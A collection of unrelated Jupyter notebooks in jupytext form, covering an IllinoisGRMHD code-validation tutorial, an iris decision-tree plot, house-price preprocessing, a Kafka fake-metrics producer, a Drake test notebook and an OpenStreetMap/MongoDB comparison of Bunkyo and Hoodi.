static inline CCTK_REAL avg(CCTK_REAL f[PLUS2+1][PLUS2+1][PLUS2+1],int imin,int imax, int jmin,int jmax, int kmin,int kmax) {
CCTK_REAL retval=0.0,num_in_sum=0.0;
// Accumulate every point in the box and count how many were summed.
for(int kk=kmin;kk<=kmax;kk++) for(int jj=jmin;jj<=jmax;jj++) for(int ii=imin;ii<=imax;ii++) {
retval+=f[kk][jj][ii]; num_in_sum++;
}
return retval/num_in_sum;
}
# -
# <a id='code_validation'></a>
#
# # Step 2: Code validation \[Back to [top](#toc)\]
# $$\label{code_validation}$$
#
# First we download the original `IllinoisGRMHD` source code and then compare it to the source code generated by this tutorial notebook.
# +
# # Verify if the code generated by this tutorial module
# # matches the original IllinoisGRMHD source code
# # First download the original IllinoisGRMHD source code
# import urllib
# from os import path
# original_IGM_file_url = "https://bitbucket.org/zach_etienne/wvuthorns/raw/5611b2f0b17135538c9d9d17c7da062abe0401b6/IllinoisGRMHD/src/Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C"
# original_IGM_file_name = "Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs-original.C"
# original_IGM_file_path = os.path.join(IGM_src_dir_path,original_IGM_file_name)
# # Then download the original IllinoisGRMHD source code
# # We try it here in a couple of ways in an attempt to keep
# # the code more portable
# try:
# original_IGM_file_code = urllib.request.urlopen(original_IGM_file_url).read().decode("utf-8")
# # Write down the file the original IllinoisGRMHD source code
# with open(original_IGM_file_path,"w") as file:
# file.write(original_IGM_file_code)
# except:
# try:
# original_IGM_file_code = urllib.urlopen(original_IGM_file_url).read().decode("utf-8")
# # Write down the file the original IllinoisGRMHD source code
# with open(original_IGM_file_path,"w") as file:
# file.write(original_IGM_file_code)
# except:
# # If all else fails, hope wget does the job
# # !wget -O $original_IGM_file_path $original_IGM_file_url
# # Perform validation
# # Validation__Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs__C = !diff $original_IGM_file_path $outfile_path__Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs__C
# if Validation__Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs__C == []:
# # If the validation passes, we do not need to store the original IGM source code file
# # !rm $original_IGM_file_path
# print("Validation test for Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C: PASSED!")
# else:
# # If the validation fails, we keep the original IGM source code file
# print("Validation test for Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C: FAILED!")
# # We also print out the difference between the code generated
# # in this tutorial module and the original IGM source code
# print("Diff:")
# for diff_line in Validation__Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs__C:
# print(diff_line)
# -
# <a id='latex_pdf_output'></a>
#
# # Step 3: Output this notebook to $\LaTeX$-formatted PDF file \[Back to [top](#toc)\]
# $$\label{latex_pdf_output}$$
#
# The following code cell converts this Jupyter notebook into a proper, clickable $\LaTeX$-formatted PDF file. After the cell is successfully run, the generated PDF may be found in the root NRPy+ tutorial directory, with filename
# [Tutorial-IllinoisGRMHD__Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.pdf](Tutorial-IllinoisGRMHD__Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.pdf) (Note that clicking on this link may not work; you may need to open the PDF file through another means).
# Path to the NRPy+ LaTeX template used by nbconvert when turning this
# notebook into a PDF (nrpy_dir_path is defined earlier in the notebook).
latex_nrpy_style_path = os.path.join(nrpy_dir_path,"latex_nrpy_style.tplx")
# #!jupyter nbconvert --to latex --template $latex_nrpy_style_path --log-level='WARN' Tutorial-IllinoisGRMHD__Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.ipynb
# #!pdflatex -interaction=batchmode Tutorial-IllinoisGRMHD__Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.tex
# #!pdflatex -interaction=batchmode Tutorial-IllinoisGRMHD__Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.tex
# #!pdflatex -interaction=batchmode Tutorial-IllinoisGRMHD__Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.tex
# Clean up LaTeX build artifacts left behind by pdflatex.
# !rm -f Tut*.out Tut*.aux Tut*.log
|
IllinoisGRMHD/doc/Tutorial-IllinoisGRMHD__Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/andresvilla86/diadx-ia-ml/blob/master/python-arboles-de-decision-002.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + id="TeK7c3uYd1Gm"
import numpy as np
import matplotlib.pyplot as plt
from sklearn.datasets import load_iris
from sklearn.tree import DecisionTreeClassifier, plot_tree

# Plotting parameters.
n_classes = 3          # iris has three species
plot_colors = "ryb"    # one colour per class
plot_step = 0.02       # mesh resolution for the decision surface

# Load data
iris = load_iris()

# BUG FIX: the loop bodies below had lost their indentation, which is a
# syntax error in Python; structure restored.
for pairidx, pair in enumerate([[0, 1], [0, 2], [0, 3],
                                [1, 2], [1, 3], [2, 3]]):
    # We only take the two corresponding features
    X = iris.data[:, pair]
    y = iris.target

    # Train a tree on this feature pair.
    clf = DecisionTreeClassifier().fit(X, y)

    # Plot the decision boundary on a dense grid covering the data range.
    plt.subplot(2, 3, pairidx + 1)
    x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
    y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
    xx, yy = np.meshgrid(np.arange(x_min, x_max, plot_step),
                         np.arange(y_min, y_max, plot_step))
    plt.tight_layout(h_pad=0.5, w_pad=0.5, pad=2.5)

    Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
    Z = Z.reshape(xx.shape)
    cs = plt.contourf(xx, yy, Z, cmap=plt.cm.RdYlBu)

    plt.xlabel(iris.feature_names[pair[0]])
    plt.ylabel(iris.feature_names[pair[1]])

    # Plot the training points (cmap dropped: it is ignored when a single
    # colour is passed via c=, and newer matplotlib warns about it).
    for i, color in zip(range(n_classes), plot_colors):
        idx = np.where(y == i)
        plt.scatter(X[idx, 0], X[idx, 1], c=color, label=iris.target_names[i],
                    edgecolor='black', s=15)

plt.suptitle("Decision surface of a decision tree using paired features")
plt.legend(loc='lower right', borderpad=0, handletextpad=0)
plt.axis("tight")

# Separate figure: the full tree trained on all four features.
plt.figure()
clf = DecisionTreeClassifier().fit(iris.data, iris.target)
plot_tree(clf, filled=True)
plt.show()
|
python-arboles-de-decision-002.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda env:573]
# language: python
# name: conda-env-573-py
# ---
# +
import pandas as pd
# classifiers / models
from sklearn.linear_model import LinearRegression, LogisticRegression, Ridge, RidgeCV
# other
from sklearn.metrics import accuracy_score, log_loss, make_scorer, mean_squared_error
from sklearn.model_selection import (
GridSearchCV,
RandomizedSearchCV,
ShuffleSplit,
cross_val_score,
cross_validate,
train_test_split,
)
# -
# Load the pre-split train/validation features and targets from CSV.
# Column names match the Ames / Kaggle House Prices dataset — TODO confirm.
X_train = pd.read_csv('data/X_train.csv')
X_valid = pd.read_csv('data/X_valid.csv')
y_train = pd.read_csv('data/y_train.csv')
y_valid = pd.read_csv('data/y_valid.csv')
X_train
# +
# Feature groups: every column is assigned to exactly one treatment —
# one-hot (cat), scaling (num), ordinal (ord), binary, pass-through, or drop.
cat_cols = ['MSSubClass', 'MSZoning', 'Street', 'Alley', 'LotShape',  # possibly move LotShape/LandSlope to ord
            'LandContour', 'Utilities', 'LotConfig', 'LandSlope', 'Neighborhood',
            'Condition1', 'Condition2', 'BldgType', 'HouseStyle', 'RoofStyle',
            'RoofMatl', 'Exterior1st', 'Exterior2nd', 'MasVnrType', 'Foundation',
            'Heating', 'Electrical', 'Fireplaces', 'GarageType', 'GarageFinish',
            'PavedDrive', 'MiscFeature', 'BsmtQual', 'GarageQual', 'GarageCond',
            'BsmtCond', 'BsmtExposure', 'BsmtFinType1', 'BsmtFinType2', 'PoolQC', 'Fence']
# BUG FIX: 'BsmtFinSF1' was listed twice; the second entry should be
# 'BsmtFinSF2' (type-2 finished basement square feet in the Ames schema).
num_cols = ['LotFrontage', 'LotArea', 'YearBuilt', 'YearRemodAdd', 'MasVnrArea',
            'BsmtFinSF1', 'BsmtFinSF2', 'BsmtUnfSF', 'TotalBsmtSF', '1stFlrSF', '2ndFlrSF',
            'LowQualFinSF', 'GrLivArea', 'BsmtFullBath', 'BsmtHalfBath', 'FullBath',
            'HalfBath', 'BedroomAbvGr', 'KitchenAbvGr', 'TotRmsAbvGrd', 'GarageYrBlt', 'GarageCars',
            'GarageArea', 'WoodDeckSF', 'OpenPorchSF', 'EnclosedPorch', '3SsnPorch',
            'ScreenPorch', 'PoolArea', 'MiscVal', 'MoSold', 'YrSold']
# Quality columns with a natural worst -> best ordering (see `ordinates`).
ord_cols = ['ExterQual', 'ExterCond', 'HeatingQC',
            'KitchenQual', 'Functional', 'FireplaceQu']
pass_cols = ['OverallQual', 'OverallCond']  # already numeric 1-10 scales
bin_cols = ['CentralAir']                   # Y/N flag
drop_feats = ['Unnamed: 0', 'Id']           # bookkeeping columns, not features
# -
X_train['CentralAir']
# +
# Sorting Ordinal Columns
# Category orderings (worst -> best) for the OrdinalEncoder, one tuple
# entry per column in ord_cols.
std_grading = ['Po', 'Fa', 'TA', 'Gd', 'Ex']
function_grading = ['Typ', 'Min1', 'Min2', 'Mod', 'Maj1', 'Maj2', 'Sev', 'Sal']
fire_grading = ['no_fireplace'] + std_grading
# Four quality columns share the standard grading scale.
ordinates = (std_grading,) * 4 + (function_grading, fire_grading)
ordinates
# -
# ### Steps to take here
#
# 1. Scale numeric columns
# 2. One-hot encode categorical columns
# 3. create ordinate for ordinal categories
# 4. create binary features
# 5. pass through o
# +
from sklearn.compose import ColumnTransformer, make_column_transformer
# Classifiers
from sklearn.dummy import DummyClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.impute import SimpleImputer
# classifiers / models
from sklearn.linear_model import LogisticRegression
# other
from sklearn.model_selection import (
GridSearchCV,
RandomizedSearchCV,
cross_val_score,
cross_validate,
train_test_split,
)
from sklearn.pipeline import Pipeline, make_pipeline
from sklearn.preprocessing import OneHotEncoder, OrdinalEncoder, StandardScaler
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeRegressor, export_graphviz
from sklearn.dummy import DummyClassifier, DummyRegressor
# -
# Column transformer: scale numerics, ordinal-encode graded columns,
# one-hot encode nominals, and binary-encode CentralAir.
preprocessor = make_column_transformer(
    (StandardScaler(), num_cols),
    (OrdinalEncoder(categories=ordinates), ord_cols),
    (OneHotEncoder(handle_unknown="ignore", sparse=False), cat_cols),
    (OneHotEncoder(drop='if_binary', sparse=False), bin_cols),
    # ('passthrough', pass_cols)  # NOTE(review): pass_cols are currently dropped — confirm intended
)

# BUG FIX: fit before inspecting. `named_transformers_` and the encoders'
# `get_feature_names()` are fitted attributes; accessing them before
# fit_transform raises AttributeError/NotFittedError.
X = preprocessor.fit_transform(X_train)
preprocessor.named_transformers_
# Reconstruct output column names: numeric + ordinal keep their input
# names; the two one-hot encoders expand into one column per category.
transfeat_names = num_cols + ord_cols + list(preprocessor.named_transformers_['onehotencoder-1'].get_feature_names()) + list(preprocessor.named_transformers_['onehotencoder-2'].get_feature_names())
pd.DataFrame(X, columns=transfeat_names)

# Baseline score with a dummy regressor, then a regularized linear model.
pipe = make_pipeline(preprocessor, DummyRegressor())
pipe.fit(X_train, y_train)
pipe.score(X_valid, y_valid)

pipe = make_pipeline(preprocessor, RidgeCV())
pipe.fit(X_train, y_train)
pipe.score(X_valid, y_valid)
|
Preprocess.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Kafka Producer
# !pip install Faker
import random
import time
import json
from faker import Faker
from kafka import KafkaProducer
from kafka.errors import KafkaError
from IPython.display import clear_output

# JSON-serializing producer pointed at the in-cluster Kafka service.
producer = KafkaProducer(
    bootstrap_servers=['kafka-headless.data:9092'],
    value_serializer=lambda m: json.dumps(m).encode('utf-8')
)

# Create 10 fake device ids.
fake = Faker()
device = [fake.mac_address() for i in range(10)]

# Send 100 sets of random metrics to Kafka using the 10 fake device ids.
# Pause for 1 second between messages.
for i in range(100):
    msg = {
        # BUG FIX: randrange(1, 10) only produced indices 1-9, so
        # device[0] was never used; random.choice draws from all 10 ids.
        'device': random.choice(device),
        'sensor1': random.randrange(1, 10),
        'sensor2': random.randrange(100, 10000),
    }
    producer.send('metrics', msg)
    clear_output(wait=True)
    print(f'Sent message {(i+1):03d}: \n{json.dumps(msg, indent=2)}')
    time.sleep(1)
|
20-KafkaProducer.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# This is an example Jupyter notebook in Drake to be run from Bazel.
# +
# Minimal check that each dependency works when the notebook runs under
# Bazel: ipywidgets, NumPy, and the Drake example library.
import ipywidgets as widgets
import numpy as np
from drake.tools.jupyter.example_library import my_func
# -
np.array([1, 2, 3])  # NumPy is importable and functional
assert my_func() == "Hello"  # Drake example library is on the path
widgets.IntSlider()  # ipywidgets can construct (and render) a widget
|
tools/jupyter/example.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [default]
# language: python
# name: python2
# ---
# # **P3 - Data Wrangling with MongoDB**
# # **OpenStreetMap Project Data Wrangling with MongoDB**
# ## <NAME><a name="top"></a>
# Data used -<a href=https://mapzen.com/metro-extracts/> MapZen Weekly OpenStreetMaps Metro Extracts</a>
#
#
# Map Areas:
# These two maps were selected because I currently live in Hoodi, Bengaluru, and my dream is to do my master's in robotics in Japan, so I chose the locality of the University of Tokyo in Bunkyo. I wanted to explore the differences between the two regions.
#
#
# - <a href=https://mapzen.com/data/metro-extracts/your-extracts/fdd7c4ef0518> Bonkyu,Tokyo,Japan. </a>
# - <a href=https://mapzen.com/data/metro-extracts/your-extracts/c1f2842408ac> Hoodi,Bengaluru,india </a>
#
# Working Code :
# - <a href=https://mapzen.com/data/metro-extracts/your-extracts/fdd7c4ef0518> Bonkyu,Tokyo,Japan. </a>
#
#
# <hr>
# 1. [Problems Encountered in the Map](#problems)
# - [Filtering Different Language names](#Language)
# - [Over-abbreviated Names](#abbr)
# - [Merging both cities](#combine_cities)
# 2. [Data Overview](#data_overview)
# 3. [Additional Data Exploration using MongoDB](#exploration)
# 4. [Conclusion](#conclusion)
# <hr>
# <h2><a name="problems"></a> **1. Problems Encountered**</h2>
#
# - Some of names were in different Languages so ,i had to filter out them and select english names for both maps Hoodi and Bunkyo
# - Street names with different types of abbreviations. (i.e. 'Clark Ave SE' or 'Eubank Northeast Ste E-18')
# - Two cities have to be accessed from one database
# ### Names in Different Language<a name="Language"></a>
# Different regions use different languages, and some names were written in non-English scripts; these are filtered so that only English names are kept.
# The helper below checks whether the characters are ASCII or not.
#
def isEnglish(string):
    """Return True when *string* contains only ASCII characters.

    Names written in non-Latin scripts fail the ASCII encode, so this
    filter keeps only English names from the map data.
    """
    try:
        string.encode('ascii')
        return True
    except UnicodeEncodeError:
        return False
# <hr>
# ### **Over-abbreviated Names**<a name="abbr"></a>
#
# Since the most of data being manually uploaded, there are lot of abbreviations in street names,locality names.
# Where they are filtered and replaced with full names.
#
#
#the city below can be hoodi or bunkyo
for st_type, ways in city_types.iteritems():
for name in ways:
better_name = update_name(name, mapping)
if name != better_name:
print name, "=>", better_name
# +
#few examples
Bunkyo:
Meidai Jr. High Sch. => Meidai Junior High School
St. Mary's Cathedral => Saint Mary's Cathedral
Shinryukei brdg. E. => Shinryukei Bridge East
Iidabashi Sta. E. => Iidabashi Station East
...
Hoodi:
St. Thomas School => Saint Thomas School
Opp. Jagrithi Apartment => Opposite Jagrithi Apartment
...
# -
# <hr>
# ### **Merging Both cities**<a name="combine_cities"></a>
# These two maps are selected since ,right now i am living at Hoodi,Bengaluru. And one day i want do my masters in japan in robotics,so i had selected locality of University of tokyo, Bunkyo.I really wanted to explore differences between the regions.
#
# I need to add a tag named "city" so i can differentiate them from the database.
# <hr>
# ## **2. Data Overview**<a name="data_overview"></a>
# This section contains basic statistics about the dataset and the MongoDB queries used to gather them.
# ### **File Sizes**
bangalore.osm -40MB
bangalore.osm.json-51MB
tokyo1.osm- 82MB
tokyo1.osm.json-102.351MB
# #### **Number of documents**
print "Bunkyo:",mongo_db.cities.find({'city':'bunkyo'}).count()
print "Hoodi:",mongo_db.cities.find({'city':'hoodi'}).count()
# - Bunkyo: 1268292
# - Hoodi: 667842
# #### **Number of node nodes.**
print "Bunkyo:",mongo_db.cities.find({"type":"node",
'city':'bunkyo'}).count()
print "Hoodi:",mongo_db.cities.find({"type":"node",
'city':'hoodi'}).count()
Bunkyo: 1051170
Hoodi: 548862
# #### **Number of way nodes.**
print "Bunkyo:",mongo_db.cities.find({'type':'way',
'city':'bunkyo'}).count()
print "Hoodi:",mongo_db.cities.find({'type':'way',
'city':'hoodi'}).count()
Bunkyo: 217122
Hoodi: 118980
# #### **Total Number of contributor.**
print "Constributors:", len(mongo_db.cities.distinct("created.user"))
Contributors: 858
# <hr>
# ## **3. Additional Data Exploration using MongoDB**<a name="exploration"></a>
# I am going to use the pipeline function to retrive data from the database
def pipeline(city):
    """Build the aggregation pipeline returning the top-5 contributors
    (by edit count) for the given *city*."""
    match_stage = {"$match": {"created.user": {"$exists": 1},
                              "city": city}}
    group_stage = {"$group": {"_id": {"City": "$city",
                                      "User": "$created.user"},
                              "contribution": {"$sum": 1}}}
    project_stage = {"$project": {'_id': 0,
                                  "City": "$_id.City",
                                  "User_Name": "$_id.User",
                                  "Total_contribution": "$contribution"}}
    # Sort by contribution, descending, and keep the five busiest users.
    return [match_stage, group_stage, project_stage,
            {"$sort": {"Total_contribution": -1}},
            {"$limit": 5}]
result1 =mongo_db["cities"].aggregate(pipeline('bunkyo'))
for each in result1:
print(each)
print("\n")
result2 =mongo_db["cities"].aggregate(pipeline('hoodi'))
for each in result2:
print(each)
# + active=""
# Bunkyo:
# {u'City': u'bunkyo', u'User_Name': u'kurauchi', u'Total_contribution': 667425}
# {u'City': u'bunkyo', u'User_Name': u'watao', u'Total_contribution': 216855}
# {u'City': u'bunkyo', u'User_Name': u'higa4', u'Total_contribution': 40845}
# {u'City': u'bunkyo', u'User_Name': u'ikiya', u'Total_contribution': 37287}
# {u'City': u'bunkyo', u'User_Name': u'javbw', u'Total_contribution': 26655}
#
# Hoodi:
# {u'City': u'hoodi', u'User_Name': u'praveeng', u'Total_contribution': 75153}
# {u'City': u'hoodi', u'User_Name': u'akhilsai', u'Total_contribution': 70509}
# {u'City': u'hoodi', u'User_Name': u'anthony1', u'Total_contribution': 52194}
# {u'City': u'hoodi', u'User_Name': u'anushapyata', u'Total_contribution': 45540}
# {u'City': u'hoodi', u'User_Name': u'docaneesh', u'Total_contribution': 38703}
# -
# The top contributors for hoodi are no where near since bunkyo being a more compact region than hoodi ,there are more places to contribute.
# <hr>
# ### To get the top Amenities in Hoodi and Bunkyo
# I will be showing the pipeline that will go in the above mentioned "Pipleline" function
pipeline=[{"$match":{"Additional Information.amenity":{"$exists":1},
"city":city}},
{"$group": {"_id": {"City":"$city",
"Amenity":"$Additional Information.amenity"},
"count": {"$sum": 1}}},
{"$project": {'_id':0,
"City":"$_id.City",
"Amenity":"$_id.Amenity",
"Count":"$count"}},
{"$sort": {"Count": -1}},
{"$limit" : 10 }]
# + active=""
# Bunkyo:
# {u'Count': 1587, u'City': u'bunkyo', u'Amenity': u'parking'}
# {u'Count': 1497, u'City': u'bunkyo', u'Amenity': u'restaurant'}
# {u'Count': 933, u'City': u'bunkyo', u'Amenity': u'cafe'}
# {u'Count': 792, u'City': u'bunkyo', u'Amenity': u'fast_food'}
# {u'Count': 723, u'City': u'bunkyo', u'Amenity': u'school'}
# {u'Count': 606, u'City': u'bunkyo', u'Amenity': u'place_of_worship'}
# {u'Count': 525, u'City': u'bunkyo', u'Amenity': u'vending_machine'}
# {u'Count': 507, u'City': u'bunkyo', u'Amenity': u'bench'}
# {u'Count': 354, u'City': u'bunkyo', u'Amenity': u'pub'}
# {u'Count': 342, u'City': u'bunkyo', u'Amenity': u'kindergarten'}
#
# Hoodi:
# {u'Count': 528, u'City': u'hoodi', u'Amenity': u'restaurant'}
# {u'Count': 216, u'City': u'hoodi', u'Amenity': u'school'}
# {u'Count': 189, u'City': u'hoodi', u'Amenity': u'atm'}
# {u'Count': 162, u'City': u'hoodi', u'Amenity': u'pharmacy'}
# {u'Count': 162, u'City': u'hoodi', u'Amenity': u'parking'}
# {u'Count': 162, u'City': u'hoodi', u'Amenity': u'place_of_worship'}
# {u'Count': 141, u'City': u'hoodi', u'Amenity': u'bank'}
# {u'Count': 141, u'City': u'hoodi', u'Amenity': u'fast_food'}
# {u'Count': 138, u'City': u'hoodi', u'Amenity': u'hospital'}
# {u'Count': 102, u'City': u'hoodi', u'Amenity': u'cafe'}
# -
# ### As compared to hoodi ,bunkyo have few atms,And parking can be commonly found in bunkyo locality
# <hr>
# ### popular places of worship
#
p = [{"$match":{"Additional Information.amenity":{"$exists":1},
"Additional Information.amenity":"place_of_worship",
"city":city}},
{"$group":{"_id": {"City":"$city",
"Religion":"$Additional Information.religion"},
"count":{"$sum":1}}},
{"$project":{"_id":0,
"City":"$_id.City",
"Religion":"$_id.Religion",
"Count":"$count"}},
{"$sort":{"Count":-1}},
{"$limit":6}]
# + active=""
# Bunkyo:
# {u'Count': 303, u'City': u'bunkyo', u'Religion': u'buddhist'}
# {u'Count': 132, u'City': u'bunkyo', u'Religion': u'shinto'}
# {u'Count': 123, u'City': u'bunkyo'}
# {u'Count': 39, u'City': u'bunkyo', u'Religion': u'christian'}
# {u'Count': 3, u'City': u'bunkyo', u'Religion': u'muslim'}
# {u'Count': 3, u'City': u'bunkyo', u'Religion': u'confucian'}
#
# Hoodi:
# {u'Count': 90, u'City': u'hoodi', u'Religion': u'hindu'}
# {u'Count': 30, u'City': u'hoodi', u'Religion': u'christian'}
# {u'Count': 24, u'City': u'hoodi'}
# {u'Count': 18, u'City': u'hoodi', u'Religion': u'muslim'}
# -
# As expected japan is popular with buddism,
#
#
# but india being a secular country it will be having most of the reglious places of worship,where hinduism being majority
# <hr>
# ### popular restaurants
p = [{"$match":{"Additional Information.amenity":{"$exists":1},
"Additional Information.amenity":"restaurant",
"city":city}},
{"$group":{"_id":{"City":"$city",
"Food":"$Additional Information.cuisine"},
"count":{"$sum":1}}},
{"$project":{"_id":0,
"City":"$_id.City",
"Food":"$_id.Food",
"Count":"$count"}},
{"$sort":{"Count":-1}},
{"$limit":6}]
# {u'Count': 582, u'City': u'bunkyo'}
# {u'Food': u'japanese', u'City': u'bunkyo', u'Count': 192}
# {u'Food': u'chinese', u'City': u'bunkyo', u'Count': 126}
# {u'Food': u'italian', u'City': u'bunkyo', u'Count': 69}
# {u'Food': u'indian', u'City': u'bunkyo', u'Count': 63}
# {u'Food': u'sushi', u'City': u'bunkyo', u'Count': 63}
#
#
# {u'Count': 213, u'City': u'hoodi'}
# {u'Food': u'regional', u'City': u'hoodi', u'Count': 75}
# {u'Food': u'indian', u'City': u'hoodi', u'Count': 69}
# {u'Food': u'chinese', u'City': u'hoodi', u'Count': 36}
# {u'Food': u'international', u'City': u'hoodi', u'Count': 24}
# {u'Food': u'Andhra', u'City': u'hoodi', u'Count': 21}
# Indian style cusine in Bunkyo seems famous, Which will be better if i go to japan and do my higher studies there.
# <hr>
# ### popular fast food joints
#
p = [{"$match":{"Additional Information.amenity":{"$exists":1},
"Additional Information.amenity":"fast_food",
"city":city}},
{"$group":{"_id":{"City":"$city",
"Food":"$Additional Information.cuisine"},
"count":{"$sum":1}}},
{"$project":{"_id":0,
"City":"$_id.City",
"Food":"$_id.Food",
"Count":"$count"}},
{"$sort":{"Count":-1}},
{"$limit":6}]
# + active=""
# {u'Count': 246, u'City': u'bunkyo'}
# {u'Food': u'burger', u'City': u'bunkyo', u'Count': 102}
# {u'Food': u'ramen', u'City': u'bunkyo', u'Count': 81}
# {u'Food': u'japanese', u'City': u'bunkyo', u'Count': 54}
# {u'Food': u'noodle', u'City': u'bunkyo', u'Count': 51}
# {u'Food': u'noodle;ramen', u'City': u'bunkyo', u'Count': 33}
#
#
# {u'Count': 66, u'City': u'hoodi'}
# {u'Food': u'pizza', u'City': u'hoodi', u'Count': 21}
# {u'Food': u'indian', u'City': u'hoodi', u'Count': 12}
# {u'Food': u'chicken', u'City': u'hoodi', u'Count': 6}
# {u'Food': u'ice_cream', u'City': u'hoodi', u'Count': 6}
# {u'Food': u'burger', u'City': u'hoodi', u'Count': 6}
# -
# Burger seems very popular among japanese in fast foods,i was expecting ramen to be more popular
#
# , but in hoodi pizza is really common,being a metropolitan city.
# <hr>
# ### ATM's near locality
#
p = [{"$match":{"Additional Information.amenity":{"$exists":1},
"Additional Information.amenity":"atm",
"city":city}},
{"$group":{"_id":{"City":"$city",
"Name":"$Additional Information.name:en"},
"count":{"$sum":1}}},
{"$project":{"_id":0,
"City":"$_id.City",
"Name":"$_id.Name",
"Count":"$count"}},
{"$sort":{"Count":-1}},
{"$limit":4}]
# + active=""
# {u'Count': 75, u'City': u'bunkyo'}
# {u'Count': 6, u'City': u'bunkyo', u'Name': u'JP Bank'}
# {u'Count': 6, u'City': u'bunkyo', u'Name': u'Mizuho'}
#
#
# {u'Count': 177, u'City': u'hoodi'}
# {u'Count': 3, u'City': u'hoodi', u'Name': u'Axis bank ATM'}
# {u'Count': 3, u'City': u'hoodi', u'Name': u'HDFC'}
# {u'Count': 3, u'City': u'hoodi', u'Name': u'Canara'}
# {u'Count': 3, u'City': u'hoodi', u'Name': u'State bank ATM'}
#
# -
# There are quite a few ATM in Bunkyo as compared to hoodi
# <hr>
# ### Martial arts or Dojo Center near locality
#
# +
## Martial arts or Dojo Center near locality
import re
pat = re.compile(r'dojo', re.I)
d=mongo_db.cities.aggregate([{"$match":{ "$or": [ { "Additional Information.name": {'$regex': pat}}
,{"Additional Information.amenity": {'$regex': pat}}]}}
,{"$group":{"_id":{"City":"$city"
, "Sport":"$Additional Information.name"}}}])
for each in d:
print(each)
# +
bunkyo:
{u'_id': {u'City': u'bunkyo', u'Sport': u'Aikikai Hombu Dojo'}}
{u'_id': {u'City': u'bunkyo', u'Sport': u'Kodokan Dojo'}}
hoodi:
{u'_id': {u'City': u'hoodi', u'Sport': u"M S Gurukkal's Kalari Academy"}}
# -
# I wanted to learn martial arts ,
# In japan is known for its akido and other ninjistsu martial arts , where i can find some in bunkyo
# Where as in hoodi,india Kalaripayattu Martial Arts are one of the ancient arts that ever existed.
# <hr>
# ### most popular shops.
#
p = [{"$match":{"Additional Information.shop":{"$exists":1},
"city":city}},
{"$group":{"_id":{"City":"$city",
"Shop":"$Additional Information.shop"},
"count":{"$sum":1}}},
{"$project": {'_id':0,
"City":"$_id.City",
"Shop":"$_id.Shop",
"Count":"$count"}},
{"$sort":{"Count":-1}},
{"$limit":10}]
# +
{u'Shop': u'convenience', u'City': u'bunkyo', u'Count': 1035}
{u'Shop': u'clothes', u'City': u'bunkyo', u'Count': 282}
{u'Shop': u'books', u'City': u'bunkyo', u'Count': 225}
{u'Shop': u'mobile_phone', u'City': u'bunkyo', u'Count': 186}
{u'Shop': u'confectionery', u'City': u'bunkyo', u'Count': 156}
{u'Shop': u'supermarket', u'City': u'bunkyo', u'Count': 150}
{u'Shop': u'computer', u'City': u'bunkyo', u'Count': 126}
{u'Shop': u'hairdresser', u'City': u'bunkyo', u'Count': 90}
{u'Shop': u'electronics', u'City': u'bunkyo', u'Count': 90}
{u'Shop': u'anime', u'City': u'bunkyo', u'Count': 90}
{u'Shop': u'clothes', u'City': u'hoodi', u'Count': 342}
{u'Shop': u'supermarket', u'City': u'hoodi', u'Count': 129}
{u'Shop': u'bakery', u'City': u'hoodi', u'Count': 120}
{u'Shop': u'shoes', u'City': u'hoodi', u'Count': 72}
{u'Shop': u'furniture', u'City': u'hoodi', u'Count': 72}
{u'Shop': u'sports', u'City': u'hoodi', u'Count': 66}
{u'Shop': u'electronics', u'City': u'hoodi', u'Count': 60}
{u'Shop': u'beauty', u'City': u'hoodi', u'Count': 54}
{u'Shop': u'car', u'City': u'hoodi', u'Count': 36}
{u'Shop': u'convenience', u'City': u'hoodi', u'Count': 36}
# -
# General/convenience stores are quite common in both places.
# ### most popular supermarkets
#
p = [{"$match":{"Additional Information.shop":{"$exists":1},
"city":city,
"Additional Information.shop":"supermarket"}},
{"$group":{"_id":{"City":"$city",
"Supermarket":"$Additional Information.name"},
"count":{"$sum":1}}},
{"$project": {'_id':0,
"City":"$_id.City",
"Supermarket":"$_id.Supermarket",
"Count":"$count"}},
{"$sort":{"Count":-1}},
{"$limit":5}]
# +
{u'Count': 120, u'City': u'bunkyo'}
{u'Count': 9, u'City': u'bunkyo', u'Supermarket': u'Maruetsu'}
{u'Count': 3, u'City': u'bunkyo', u'Supermarket': u"Y's Mart"}
{u'Count': 3, u'City': u'bunkyo', u'Supermarket': u'SainE'}
